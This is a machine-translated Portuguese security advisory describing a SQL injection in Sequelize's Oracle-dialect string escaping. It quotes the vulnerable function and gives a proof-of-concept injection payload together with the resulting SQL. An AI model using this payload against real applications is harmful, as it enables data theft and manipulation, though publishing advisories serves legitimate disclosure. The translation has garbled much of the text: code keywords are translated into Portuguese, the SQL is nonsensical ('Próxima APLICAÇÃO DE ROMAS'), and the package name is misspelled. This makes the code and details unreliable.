### Resumo A injeção SQL é possível com strings apenas ** se o dialeto estiver definido em `oracle`**. A vulnerabilidade foi confirmada no Sequelize v 6.37.3. ### Detalhes A função `escape` definida em `sql-string.js` não escapa das citações se o valor começar com `TO_TIMESTAMP` ou `TO_DATE`. ````javascript } se (dialectar === 'oracle' && typeof val === 'string') { se (val. startsWith('TO_TIMESTAMP').. val. startsWith('TO_DATE')) { retorno val; } val = val.replace(/'/g, "''"); } ````` ### PoC Suponha que o aplicativo tenha o seguinte código. ``` resultado var javascript = aguarde modelos.Student.findOne({ onde: { primeiro nome: req.query. firstName } }); `` Um atacante pode injetar expressões quadradas arbitrárias.
` firstName=TO_DATE(' 0 ','Y').' OU 1 = 1 --`. O SQL resultante será: ```SQL SELECTION... Onde "Estudante"."primeiro Nome" = TO_DATE(' 0 ','Y').' OU 1 = 1 -- PEDIDO POR "Estudante"."id" OFFSET 0 Próxima APLICAÇÃO DE ROMAS 1 SOLO ROWS; ``` ### Roubo e manipulação de dados de impacto. Registro de aconselhamento: GHSA-v 8 fg- 2 rw 7 - q 452. Identificadores relacionados: CVE- 2026 - 69240.
Tempo: GitHub Advisory Database publicou este registro em 2026 - 08 - 03 T 20: 29: 50.000 Z e lista a sua última modificação como 2026 - 08 - 03 T 20: 29: 50.000 Z. Gravidade: Crítico. Dados de pontuação publicados: CVSS_V 3: CVSS: 3.1 /AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H. Software afetado e informações de versão: pacote npm sequelature — ECOSISTEM: introduzido 0, corrigido 6.37.4. Classificação e evidência: identificadores de fraqueza CWE- 89. O registro contém 4 suporte de referências nestes tipos: WEB, PACKAGE.